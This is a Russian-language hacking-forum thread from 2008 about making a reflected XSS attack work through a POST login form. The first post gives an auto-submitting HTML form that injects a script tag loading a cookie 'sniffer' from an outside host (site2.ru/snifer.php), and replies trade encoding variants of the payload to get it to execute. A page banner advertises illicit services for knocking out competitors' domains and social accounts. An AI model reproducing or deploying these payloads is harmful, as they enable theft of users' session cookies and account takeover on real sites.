Пасивная Xss через Post

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Пасивная Xss через Post

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Пасивная Xss через Post

14.01.2008, 03:34

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

Пасивная Xss через Post

Привет всем со старым НГ!!
вот вопрос

PHP код:


		
			
<form name="authForm" id="authForm" method="post" action="http://site.ru/login.php">

<input type="hidden" name="Login" value=""><script src="http://site2.ru/snifer.php"></script>">

<input type="hidden" name="securityCode" value="0000">

<input type="hidden" name="Submit.x" value="67">

<input type="hidden" name="Submit.y" value="16">

<script language="JavaScript" type="text/javascript">document.authForm.submit();</script>

</form>

ответ есть но не срабатывает "><script src="http://site2.ru/snifer.php">
нужно обновить страницу тогда работает

может както подругому зделать?

𝕏 Twitter Reddit Telegram Копировать ссылку

14.01.2008, 03:42

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

С нами: 10489346

Репутация: 1403

Цитата:

value=""><script src="http://site2.ru/snifer.php"></script>">

Попробуй вместо " поставить %22

Последний раз редактировалось bul.666; 14.01.2008 в 03:45..

14.01.2008, 03:43

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

а как быть?

просто в качестве логина надо сылку вида "><script src="http://site2.ru/snifer.php">

14.01.2008, 03:46

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

С нами: 10489346

Репутация: 1403

%22><script src=http://site2.ru/snifer.php></script>
Попробуй так

14.01.2008, 03:48

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

так не работает

14.01.2008, 03:50

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

в поле логин %22><script src=http://site2.ru/snifer.php></script>

14.01.2008, 03:51

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

так работает "><script src=http://site2.ru/snifer.php></script>!!!

но надо обновить страницу чтоб выполнился <script src=http://site2.ru/snifer.php></script>

14.01.2008, 03:51

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

С нами: 10489346

Репутация: 1403

Ой торможу =)
value='"><script src=http://site2.ru/snifer.php></script>'>

14.01.2008, 12:09

Student :)

Участник форума

Регистрация: 09.02.2007

Сообщений: 202

С нами: 10132786

Репутация: 9

Помогите решить с меня +

#10

14.01.2008, 12:11

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,315

С нами: 10248806

Репутация: 2371

Юзай FireBug в фф, там нажать применить и обновишь страницу, все ок будет

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Dle есть ли пасивная Xss ?	Student :)	Уязвимости	1	25.12.2007 19:43
через xss куки на снифер	LeopardSS	Уязвимости Mail-сервис	1	20.01.2006 21:18
Взлом IBP 2.0.4 через Xss	Astro	Уязвимости CMS / форумов	3	29.11.2005 21:29
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23